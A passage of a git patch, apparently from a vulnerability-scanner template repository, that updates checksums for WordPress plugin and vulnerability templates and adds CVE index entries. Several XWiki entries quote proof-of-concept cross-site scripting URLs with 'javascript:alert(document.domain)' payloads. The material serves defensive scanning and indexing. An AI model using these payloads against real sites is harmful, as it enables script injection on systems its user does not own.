-http/technologies/wordpress/plugins/really-simple-ssl.yaml:bb7296600fad043c5a5fa3ea8c4d3de597e133bc -http/technologies/wordpress/plugins/redirection.yaml:f2fc65063eeb5b4f425e53c33e752b0acc46e8f1 -http/technologies/wordpress/plugins/redux-framework.yaml:af9b75a984712e6609f6bd94f956e026b9dc307b -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:c0fa1d1aece59d5d6e8e708f4b2d49e769998dd9 -http/technologies/wordpress/plugins/royal-elementor-addons.yaml:81ee3491d2caa18b8f476cbc4f8bdf6645f98857 -http/technologies/wordpress/plugins/safe-svg.yaml:7593c611e1da50fc587d7a34a6447f494d5cddb8 -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:91918b715b41c561ccd6da01b15c5710ceefd48d -http/technologies/wordpress/plugins/sg-cachepress.yaml:86a47e535c821c5c1af37c73687729982a7e8256 -http/technologies/wordpress/plugins/sg-security.yaml:e833734b1006bc06ee6c86a825b3902ec67fb113 -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:55d132c332394a78efb0b3130261bf37cc0612d2 -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:196c39da6c914816c14f11df5fc9106d9439f200 -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:f7959e70ca5912ffccbe8bfb5aaf69f15dea94ad -http/technologies/wordpress/plugins/simple-history.yaml:2159d42f27309f1f6a116a76e883b46ef1087ce9 +http/technologies/wordpress/plugins/popup-maker.yaml:a119f43cbbd770a907ee7d2ad13011efce567555 +http/technologies/wordpress/plugins/post-smtp.yaml:dc895cb358a618f61e6834e99accdacc0844dcf5 +http/technologies/wordpress/plugins/post-types-order.yaml:7e3540bf816be4d048425c2fb01ff8e8714dab84 +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:c33ee34e23755ff20142ea49d583df7bc2f41c12 +http/technologies/wordpress/plugins/pretty-link.yaml:db30c7c036bb817ae8ce52bf9b3229948c1a7b1d +http/technologies/wordpress/plugins/really-simple-captcha.yaml:bc6c037badbe4128a8af6a211802e8f2ef2ceeec +http/technologies/wordpress/plugins/really-simple-ssl.yaml:035cadd420db41c138096b3b87a4349ee5c84cc1 +http/technologies/wordpress/plugins/redirection.yaml:b84a15b9bd0e8031d8901bf6a8d27178d52b3a3a +http/technologies/wordpress/plugins/redux-framework.yaml:a2715ebf2eeb42ac3fb873165efdcdb69e9ebdaf +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:aeb3f3290068227522abc6f02fec08cb256f2d9d +http/technologies/wordpress/plugins/royal-elementor-addons.yaml:c295f04b494da43cd70233731a23e12561670465 +http/technologies/wordpress/plugins/safe-svg.yaml:6146907e0b916d2efa0d5d67fd862b370bc76c55 +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:99cee49480e21b048345cd7491ef4e3fbb7f1800 +http/technologies/wordpress/plugins/sg-cachepress.yaml:7b6836ae292b3fd29a3bea109a800aa5dc5db58d +http/technologies/wordpress/plugins/sg-security.yaml:236383cdf89abd2a1c762a6c012781ac80bcb1d3 +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:a9d5065147a17e49babd54ffc5f4ebaffb433c69 +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:7d4994ffb30b3a738179033432391284c5f79b97 +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:167ceb2c0a42f1d2719ec0fa185b8bdfa837ceff +http/technologies/wordpress/plugins/simple-history.yaml:57491475d8dda459c6c85e6c3a5daaa57c7c1996 http/technologies/wordpress/plugins/simple-page-ordering.yaml:7d96ac56d7ed2ed031b6789429888ef703d39538 -http/technologies/wordpress/plugins/siteguard.yaml:1603622bb764bbd891fa245b1fb0851d8443eec0 -http/technologies/wordpress/plugins/siteorigin-panels.yaml:bdd37fdd569c13441fb87d5a310a8beca53ecead -http/technologies/wordpress/plugins/smart-slider-3.yaml:6669412fae6e1f830d8132df4b3ad7036fa95746 -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:9e123d8b5122703a197a8279f6b6612af707aa1f +http/technologies/wordpress/plugins/siteguard.yaml:95e58823cc6b51c85961fbbc884a624b83e416af +http/technologies/wordpress/plugins/siteorigin-panels.yaml:9b7fe6f885fefb92f9a62f3dbd037def8ee50bd5 +http/technologies/wordpress/plugins/smart-slider-3.yaml:451faad7065dd729fe0cd2bfbbd3ac3f94ef7035 +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:2b25fda84a6fec16553940676c815d4c488ff8e6 http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:aab70fa0f4b1c898371aa4af959db60e6cc733dd -http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:218b764f5e7ec74be15c072c6dcef4976de6d79b -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:48e485435630e99bcc197171a946575b47361c73 -http/technologies/wordpress/plugins/sucuri-scanner.yaml:73a5d57f8a22ede9c4de7d3fba4f1aeaa4c4bb2e -http/technologies/wordpress/plugins/svg-support.yaml:9e209af3c91abf6ba27d6d2b49ddf7196dc91450 -http/technologies/wordpress/plugins/table-of-contents-plus.yaml:e9ca166f376b599e787a66db6114262e2a888811 -http/technologies/wordpress/plugins/tablepress.yaml:1907c25a373a78ea4c81d21eae209acb12104a9b -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:a8ac16c00a1fe225e48ebe24c94aba1323e1e584 -http/technologies/wordpress/plugins/templately.yaml:2b4d2d3c2706a8736bd848f882e18bb587689859 -http/technologies/wordpress/plugins/the-events-calendar.yaml:52c6ff41c4bd34154268728639cfa0e3b4f8d8ab +http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:bc8097b9d9235eebe55ef173705f464f0bfda5f9 +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:7f377a37a5cd60376685cc4f197088fba64010e6 +http/technologies/wordpress/plugins/sucuri-scanner.yaml:3e5df8bafbc47c597cb02ce100adee49f936bb99 +http/technologies/wordpress/plugins/svg-support.yaml:31b1bbd478901818b88e831e015ffe69ba1deca1 +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:1119b6000394943ae8a1d017dc3c327cf09a210c +http/technologies/wordpress/plugins/tablepress.yaml:7aeb03b7055b4511c7d61e0f34851b0afafec4cc +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:44b2c2a7e6e78e9407eba0a052c4bd526b00e8c3 +http/technologies/wordpress/plugins/templately.yaml:5fa23438d9a5d3e5843076dff3d85bb0464d8cfb +http/technologies/wordpress/plugins/the-events-calendar.yaml:a5a33addc25cc9965f99b6699a7b80b24b22d3c7 http/technologies/wordpress/plugins/themeisle-companion.yaml:c706aef04e5b9ce414f460819eca30bb3bcb00e5 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:9e6bb4ae3c2a1718e019e5374810c6b9e64fa3f5 -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:97b7e9a9b4b15aff49cca7d5e725392e7bf627fd -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:9c37c0d9262b2938015364f494651b05b0fa6033 -http/technologies/wordpress/plugins/under-construction-page.yaml:c76e58a7cf7365aaaa3685531874f5d2ea3d1b68 +http/technologies/wordpress/plugins/tinymce-advanced.yaml:f7e1c1edb4e7353e6fac96fb8c87fdf1bdb66fb9 +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:8c87e9fffcebf5f04645f46033dbb7bed21522b3 +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:a87e7e8277478e7505eb436685ca87c0ce130872 +http/technologies/wordpress/plugins/under-construction-page.yaml:52121a50514aaaf7d7a59ce926f54aa10cf15ba3 http/technologies/wordpress/plugins/unyson.yaml:e01d9f525f3cf577ab43441c694230c07608611e -http/technologies/wordpress/plugins/updraftplus.yaml:5050d66d21b2380882e67332a769bc7da06154e6 +http/technologies/wordpress/plugins/updraftplus.yaml:edcd863200181bd414befba2b1761eb3e2fd9534 http/technologies/wordpress/plugins/use-any-font.yaml:e1c358a86017c4c3f5abe62d76da6878d61f5d47 -http/technologies/wordpress/plugins/user-role-editor.yaml:65b055fb6332b2169a9e7143591f116c146e06a8 +http/technologies/wordpress/plugins/user-role-editor.yaml:49fd50c927e45ae27da74152958884a1103e653d http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:1a6d9e7560dba5c9471c20cffdf0ba1b098fbb7c -http/technologies/wordpress/plugins/w3-total-cache.yaml:e6d76a664a5009598ce3e2d6f3b412667c9cacef -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:305690e415de547348ac36cf0d9544b347b16a38 -http/technologies/wordpress/plugins/webp-express.yaml:fcb956491146843be9f3b5f152965cc0796f75e8 -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:ffa48fc0f80ceb41dff2b5c69116837b0111e074 -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6db1302965c217cd38e160295fd9d7defa47afa9 -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:c2b6a592df83eb0b6abbfa988893633cb948b997 -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:68f2dd5d2776de335efc273ddf2249b507527398 +http/technologies/wordpress/plugins/w3-total-cache.yaml:5dd3991dcd1cda648cb5b06ba23e4dc161d19ef7 +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:98f9af30cc234e4c7b4b5bf22f6bbaa53cbe6f5f +http/technologies/wordpress/plugins/webp-express.yaml:40e469d6a202f0160ef83d275eb6623eea3a9d3c +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:719ab84147c10169bb49944409fb7d82d00b0c4d +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:c4fb3e070c29d4a21a0670a6e9b44b838c7c3391 +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:865f9552ce696e2f57cacfbff5639eebec2b7693 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:0a37f42407331ea5d7ca9d524490522c195469e6 http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:4f2c82ad5cf98659804bd115d05bf9db8461e200 -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:9929d037d9f1459cff16926d024bcf666c50edda -http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:e7b3acf574cd1dc2b9d4f7a6240769a83a938856 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:60a3ada3d5bd510f77eb3a77c32d88ad20e997bc -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:b2a01f711495d5a37d201b510a6487ae816dab9b -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d3b1a70c5b241c5776101bdf5fb0ee9753725d4b -http/technologies/wordpress/plugins/woocommerce-services.yaml:6f9a1c3b761936c259c9e29ee32d28f691ae8b77 -http/technologies/wordpress/plugins/woocommerce.yaml:8231905d6d899f1da3fe5641cb3908eac4c1113f -http/technologies/wordpress/plugins/wordfence.yaml:43d1eb1e1e314aa16d9c1d5d0d5d4c59de91ac1b -http/technologies/wordpress/plugins/wordpress-importer.yaml:c7ba561f2a03d75e5f929c367ecdce158d4e456f -http/technologies/wordpress/plugins/wordpress-seo.yaml:a9de56a1598eaa8ab15ab968f734d71fdf2bc107 +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:67e91a90004596978ab908106f2d82ad74bf50ca +http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:c7f5487278701e4fc7714f159a8618d2a1e762b2 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:ddf2a1c90df35fbbe5829da6863d0611fc266cb5 +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:99bf699064a6e29385722ebe2ff3f8ebb5005ac6 +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:e4ad8d7b99eb0b0ce3e6fa1fd617b2b13cbe3b4a +http/technologies/wordpress/plugins/woocommerce-services.yaml:ccd6f7e89bea7ca67d5af5b24fead3c4926501d8 +http/technologies/wordpress/plugins/woocommerce.yaml:23253c686c07d1d1a445e7a68d6734232fd4f155 +http/technologies/wordpress/plugins/wordfence.yaml:a5d01c40c96de0bdbf4fd1b517a4b342006421a3 +http/technologies/wordpress/plugins/wordpress-importer.yaml:8d39c0c6c3425e57e2be8f6a5bd8a91e7d3a439c +http/technologies/wordpress/plugins/wordpress-seo.yaml:dc65064e66e43a467b1e9ed2c095cfc0f81af2dd http/technologies/wordpress/plugins/wordpress-woosidebars.yaml:679cd62c97446d90fc7fbb50f64403cb10c4c319 -http/technologies/wordpress/plugins/worker.yaml:eec5a16391040875785d932499c9f260e8efeb8c -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:3bac8419d21ce83693d583293fb12b438a544402 -http/technologies/wordpress/plugins/wp-file-manager.yaml:227e50238a78872a0caf5ac0c54ab4d4fa33be67 -http/technologies/wordpress/plugins/wp-google-maps.yaml:f398fe5460d8180c0e85568b79baa92355130348 -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:3c08f95f3bce5c44e7c5ebda373c397d0ddb8342 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:d7bb63c19f2338fd77cfa210fc4fa2e2c8bbff85 -http/technologies/wordpress/plugins/wp-migrate-db.yaml:996eb41fddbc34f6078ebecc34cececbb6eec504 -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:252c64b3711943bbfd6d507669f1175f2225cbb2 -http/technologies/wordpress/plugins/wp-optimize.yaml:7d8bae34481b9723031a3574ce49620e76ad88ec -http/technologies/wordpress/plugins/wp-pagenavi.yaml:2a1f36db756a5f86740144301429285d3c50fee9 -http/technologies/wordpress/plugins/wp-reset.yaml:28019b1d96d3d4c456ac774c3e5cdeb666b06859 -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:6100c61e48b0e15a0971d15714bdefa28c1fedcc -http/technologies/wordpress/plugins/wp-rollback.yaml:f7b2f501eb11a44d43b23d3933c06fe15927b2ca -http/technologies/wordpress/plugins/wp-seopress.yaml:1f1aa346cc5d9b8f6c766a4d6388dc8f90e34030 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:a4e9a4bb7976f9cab3829e15f7cf6a476a2e3792 -http/technologies/wordpress/plugins/wp-smushit.yaml:cff5012e05d9eca8dae054e4d73667340c631ddb -http/technologies/wordpress/plugins/wp-statistics.yaml:db2b26951dec4a78053fac69af816940d49cda0b -http/technologies/wordpress/plugins/wp-super-cache.yaml:312d5ce63e6b319b2688eb416664e575699fe649 +http/technologies/wordpress/plugins/worker.yaml:e8dfa9ca66a755e3a2d355be4bc3f6a721618550 +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:42cf2cf2c77fdecad7fb821139ed5faccc69e57e +http/technologies/wordpress/plugins/wp-file-manager.yaml:fa86400c421a1a342202da7b6855be94be20456e +http/technologies/wordpress/plugins/wp-google-maps.yaml:a5e4fca1b89b58bebdf9363a523e6f73a527fb39 +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:db7f011b671f3ea759d2666e5000f14cfb3091b3 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:86aa482ac992b57460bb31b10b80e47631a3cdec +http/technologies/wordpress/plugins/wp-migrate-db.yaml:b1475c1c208a27f8c7c0242228263e38d81d8434 +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:b8d8d39f1a43a008bb7f7f802609028ba323b9e6 +http/technologies/wordpress/plugins/wp-optimize.yaml:c49183c7d82cbdd4479404990625da6818e016e2 +http/technologies/wordpress/plugins/wp-pagenavi.yaml:ce00bf598ebb81449b6ae1669ac203a68d86efd7 +http/technologies/wordpress/plugins/wp-reset.yaml:14c5010a475fa909f28391b7990844fe51a0b2b2 +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:daf3725a4ddfba16679e272e295d90112334ee22 +http/technologies/wordpress/plugins/wp-rollback.yaml:a9100438f1a2f8d577ae456d454dfc84c5177501 +http/technologies/wordpress/plugins/wp-seopress.yaml:687273af9942a9e30debdb05bf4ebd1888580346 +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:5cbce95addf9da0f12f7267c3377f77a878aab60 +http/technologies/wordpress/plugins/wp-smushit.yaml:4063aad19c268ae2e25c123e911f5d8b9d256ad5 +http/technologies/wordpress/plugins/wp-statistics.yaml:8394f42eff91b17e1dbaf9a4ad9525c60aa61b65 +http/technologies/wordpress/plugins/wp-super-cache.yaml:b4ee4167ddeb2563f825be8c5f8ebf5060be257e http/technologies/wordpress/plugins/wp-user-avatar.yaml:a8aa0e902ead01de33b23343603d18b63829517e -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:a9acaa8bc79b55109355d8894c249b6e99fba870 -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:da8bff7c82756e3e1ac6810a8eb2ef194d109a43 -http/technologies/wordpress/plugins/wpforms-lite.yaml:cf27de8a9131c5a7427c0f9d3f4bfd5f378e26eb -http/technologies/wordpress/plugins/wps-hide-login.yaml:faf97e5fb87bd43caaa123bb77e5cb64d218f00d -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:f03291859093b6ab5196a683c017e300566beb9d +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:f99945a105e98af9e522edcb41c00e3025e312c4 +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:56a26c23b1d081d31bd5976146f83be73f5d3e33 +http/technologies/wordpress/plugins/wpforms-lite.yaml:351a14423a10a1dbbee555574add5750946446f7 +http/technologies/wordpress/plugins/wps-hide-login.yaml:5fd357f902adec62bf92ece79af600e26c05eea8 +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:600c08bccfe3d8d4946cd8c40c04e7d6fb835245 http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:caf39ccc6507df09c0816caa7af29404c193d9a5 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:c3474b242e88f3dd31b5317051e69194f36317f9 +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:1aa020a0a4452fc3a97327aa7417e45436ae6f59 http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml:0b85e26615c692bab9ceb5ae74dc9adec4097b9e http/technologies/wordpress-detect.yaml:a0148caf9d3f957171e7b75d4382dc7d54e454e5 http/technologies/workerman-websocket-detect.yaml:1396bc8234c4f538d5f57966b6b8084fe68f574f @@ -7850,9 +7851,9 @@ http/vulnerabilities/hikvision/hikvision-fastjson-rce.yaml:02a334888358c47036d90 http/vulnerabilities/hikvision/hikvision-ivms-file-upload-bypass.yaml:bc54a4c9f7771c524140f1840157c03bf4651a54 http/vulnerabilities/hikvision/hikvision-ivms-file-upload-rce.yaml:94de4453e34e7b36379a10dc4966aa54f3582aeb http/vulnerabilities/hikvision/hikvision-js-files-upload.yaml:cdcf6ca5518af130ebd36c1531365f6bb79001c5 -http/vulnerabilities/hjsoft/hjsoft-hcm-lfi.yaml:3382fff2cc55b5f3892ebdf734cb34c764e281c6 -http/vulnerabilities/hjsoft/hjsoft-hcm-sqli.yaml:b519d9b8bf96070aca19973c7e9f0f7c9ff7e2ae -http/vulnerabilities/hjsoft/hjsoft-hcm-tb-sqli.yaml:f75663ae56be567e6a21e3488413d54ec63f1814 +http/vulnerabilities/hjsoft/hjsoft-hcm-lfi.yaml:1aaf88fdaf99c3bec106e0e4f1ff11aa601db508 +http/vulnerabilities/hjsoft/hjsoft-hcm-sqli.yaml:8bc737814b6509549a4eba8b1b29cb7d2b39ae14 +http/vulnerabilities/hjsoft/hjsoft-hcm-tb-sqli.yaml:298ad00407b5edb22380a970d6ddc9c64b11f2b1 http/vulnerabilities/httpbin/httpbin-open-redirect.yaml:1b66933da5367fcad1de79ed46e41dd9b6b4543a http/vulnerabilities/httpbin/httpbin-xss.yaml:b8072d3dcf45a6ca85ef27483281733357126da7 http/vulnerabilities/huatian/huatian-oa-sqli.yaml:f4f35ad79e01a4fde957a9c16e13167c085e0341 @@ -8037,7 +8038,7 @@ http/vulnerabilities/other/groomify-sqli.yaml:3f757a7ee830559df2f4d03cd5635e1f5c http/vulnerabilities/other/groupoffice-lfi.yaml:f1295e4d7dc7dd52e038ade2373f4576de55dbf8 http/vulnerabilities/other/gsoap-lfi.yaml:aa242baa6456667473b08929ebdd2391ec263823 http/vulnerabilities/other/gz-forum-script-xss.yaml:4f9e19fc198666441fc949361b7e2815bb7e3622 -http/vulnerabilities/other/h3c-cnsss-arbitrary-file-upload.yaml:b64a786aa7952f8c87940b5b5aafd1d80e3f86e2 +http/vulnerabilities/other/h3c-cnsss-arbitrary-file-upload.yaml:bd35d8e02be5f51837fdc130f0507a3b458a6d99 http/vulnerabilities/other/h3c-cvm-arbitrary-file-upload.yaml:185ebc9353c39517c1963b7755f565f8d2b0ccbb http/vulnerabilities/other/h3c-imc-rce.yaml:2cbd69391843e97f2f3637a982c5ce0314b496bb http/vulnerabilities/other/hanming-lfr.yaml:511265b7bf1fb863ed2ae2d4d1551af5aa110a71 @@ -8158,7 +8159,7 @@ http/vulnerabilities/other/phpok-sqli.yaml:47a8896d38eb3940ee773e0f053e00a4d28c6 http/vulnerabilities/other/phpwiki-lfi.yaml:37fa61e3fc028ebe9d2996fbdf38cd6015264740 http/vulnerabilities/other/phuket-cms-sqli.yaml:120bcd9d748d32a71eab7b77f98969e3fc797aae http/vulnerabilities/other/phuket-cms-xss.yaml:a66543f506ca15df59732da947df46ebe7773634 -http/vulnerabilities/other/pingsheng-electronic-sqli.yaml:cd26a813b0d1f691c5b7889080ab9875b7ffb5c0 +http/vulnerabilities/other/pingsheng-electronic-sqli.yaml:f1ddab93e18549c7b6f4237654947c9bf0d34bf4 http/vulnerabilities/other/pmb-directory-traversal.yaml:3edd65226116e222366fb702f21ea383bd6a36a0 http/vulnerabilities/other/pmb-local-file-disclosure.yaml:a98bdbfe2c304c27096a31febde9927d89073c1b http/vulnerabilities/other/pmb-sqli.yaml:a8b2c7246901ec38ea0a9685c51d04c6faa4a2ca @@ -8860,7 +8861,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:235a02f2ed8f4e797abe7e3a8e45c16f1d640749 +templates-checksum.txt:c0e2bb88771fbc15e1da08f2bb9f05688e3959f6 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 5fcb27b00c9e0fdc655e82d2d284df8bb2927143 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 10 Jul 2024 06:17:50 +0000 Subject: [PATCH 1048/1841] Auto Generated cves.json [Wed Jul 10 06:17:50 UTC 2024] :robot: --- cves.json | 16 ++++++++++++++++ cves.json-checksum.txt | 2 +- 2 files changed, 17 insertions(+), 1 deletion(-) diff --git a/cves.json b/cves.json index 88414e9ef5..84eaa5bd15 100644 --- a/cves.json +++ b/cves.json @@ -806,6 +806,7 @@ {"ID":"CVE-2019-9978","Info":{"Name":"WordPress Social Warfare \u003c3.5.3 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Social Warfare plugin before 3.5.3 contains a cross-site scripting vulnerability via the wp-admin/admin-post.php?swp_debug=load_options swp_url parameter, affecting Social Warfare and Social Warfare Pro.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-9978.yaml"} {"ID":"CVE-2020-0618","Info":{"Name":"Microsoft SQL Server Reporting Services - Remote Code Execution","Severity":"high","Description":"Microsoft SQL Server Reporting Services is vulnerable to a remote code execution vulnerability because it incorrectly handles page requests.","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2020/CVE-2020-0618.yaml"} {"ID":"CVE-2020-10148","Info":{"Name":"SolarWinds Orion API - Auth Bypass","Severity":"critical","Description":"SolarWinds Orion API is vulnerable to an authentication bypass vulnerability that could allow a remote attacker to execute API commands. This vulnerability could allow a remote attacker to bypass authentication and execute API commands which may result in a compromise of the SolarWinds instance. SolarWinds Orion Platform versions 2019.4 HF 5, 2020.2 with no hotfix installed, and 2020.2 HF 1 are affected.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2020/CVE-2020-10148.yaml"} +{"ID":"CVE-2020-10189","Info":{"Name":"ManageEngine Desktop Central Java Deserialization","Severity":"critical","Description":"Zoho ManageEngine Desktop Central before 10.0.474 is vulnerable to a deserialization of untrusted data, which permits remote code execution.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2020/CVE-2020-10189.yaml"} {"ID":"CVE-2020-10199","Info":{"Name":"Sonatype Nexus Repository Manager 3 - Remote Code Execution","Severity":"high","Description":"Sonatype Nexus Repository before 3.21.2 allows JavaEL Injection","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2020/CVE-2020-10199.yaml"} {"ID":"CVE-2020-10220","Info":{"Name":"rConfig 3.9 - SQL Injection","Severity":"critical","Description":"An issue was discovered in rConfig through 3.9.4. The web interface is prone to a SQL injection via the commands.inc.php searchColumn parameter.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2020/CVE-2020-10220.yaml"} {"ID":"CVE-2020-10546","Info":{"Name":"rConfig 3.9.4 - SQL Injection","Severity":"critical","Description":"rConfig 3.9.4 and previous versions have unauthenticated compliancepolicies.inc.php SQL injection. Because nodes' passwords are stored in cleartext by default, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2020/CVE-2020-10546.yaml"} @@ -2172,7 +2173,11 @@ {"ID":"CVE-2023-34993","Info":{"Name":"Fortinet FortiWLM Unauthenticated Command Injection Vulnerability","Severity":"critical","Description":"A improper neutralization of special elements used in an os command ('os\ncommand injection') in Fortinet FortiWLM version 8.6.0 through 8.6.5 and\n8.5.0 through 8.5.4 allows attacker to execute unauthorized code or commands\nSuccessful exploitation of this vulnerability could allow an attacker to\nbypass authentication and gain unauthorized access to the affected system.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-34993.yaml"} {"ID":"CVE-2023-35078","Info":{"Name":"Ivanti Endpoint Manager Mobile (EPMM) - Authentication Bypass","Severity":"critical","Description":"Ivanti Endpoint Manager Mobile (EPMM), formerly MobileIron Core, through 11.10 allows remote attackers to obtain PII, add an administrative account, and change the configuration because of an authentication bypass, as exploited in the wild in July 2023. A patch is available.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-35078.yaml"} {"ID":"CVE-2023-35082","Info":{"Name":"MobileIron Core - Remote Unauthenticated API Access","Severity":"critical","Description":"Ivanti Endpoint Manager Mobile (EPMM), formerly MobileIron Core, Since CVE-2023-35082 arises from the same place as CVE-2023-35078, specifically the permissive nature of certain entries in the mifs web application’s security filter chain.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-35082.yaml"} +{"ID":"CVE-2023-35156","Info":{"Name":"XWiki \u003e= 6.0-rc-1 - Cross-Site Scripting","Severity":"medium","Description":"XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Users are able to forge an URL with a payload allowing to inject Javascript in the page (XSS). It's possible to exploit the delete template to perform a XSS, e.g. by using URL such as: \u003e xwiki/bin/get/FlamingoThemes/Cerulean?xpage=xpart\u0026vm=delete.vm\u0026xredirect=javascript:alert(document.domain). This vulnerability exists since XWiki 6.0-rc-1.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-35156.yaml"} {"ID":"CVE-2023-35158","Info":{"Name":"XWiki - Cross-Site Scripting","Severity":"medium","Description":"XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Users are able to forge an URL with a payload allowing to inject Javascript in the page (XSS). It's possible to exploit the restore template to perform a XSS, e.g. by using URL such as: \u003e /xwiki/bin/view/XWiki/Main?xpage=restore\u0026showBatch=true\u0026xredirect=javascript:alert(document.domain). This vulnerability exists since XWiki 9.4-rc-1. The vulnerability has been patched in XWiki 14.10.5 and 15.1-rc-1.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-35158.yaml"} +{"ID":"CVE-2023-35159","Info":{"Name":"XWiki \u003e= 3.4-milestone-1 - Cross-Site Scripting","Severity":"medium","Description":"XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Users are able to forge an URL with a payload allowing to inject Javascript in the page (XSS). It's possible to exploit the deletespace template to perform a XSS, e.g. by using URL such as: \u003e xwiki/bin/deletespace/Sandbox/?xredirect=javascript:alert(document.domain).\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-35159.yaml"} +{"ID":"CVE-2023-35160","Info":{"Name":"XWiki \u003e= 2.5-milestone-2 - Cross-Site Scripting","Severity":"medium","Description":"XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Users are able to forge an URL with a payload allowing to inject Javascript in the page (XSS). It's possible to exploit the resubmit template to perform a XSS, e.g. by using URL such as: \u003e xwiki/bin/view/XWiki/Main xpage=resubmit\u0026resubmit=javascript:alert(document.domain)\u0026xback=javascript:alert(document.domain). This vulnerability exists since XWiki 2.5-milestone-2. The vulnerability has been patched in XWiki 14.10.5 and 15.1-rc-1.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-35160.yaml"} +{"ID":"CVE-2023-35161","Info":{"Name":"XWiki 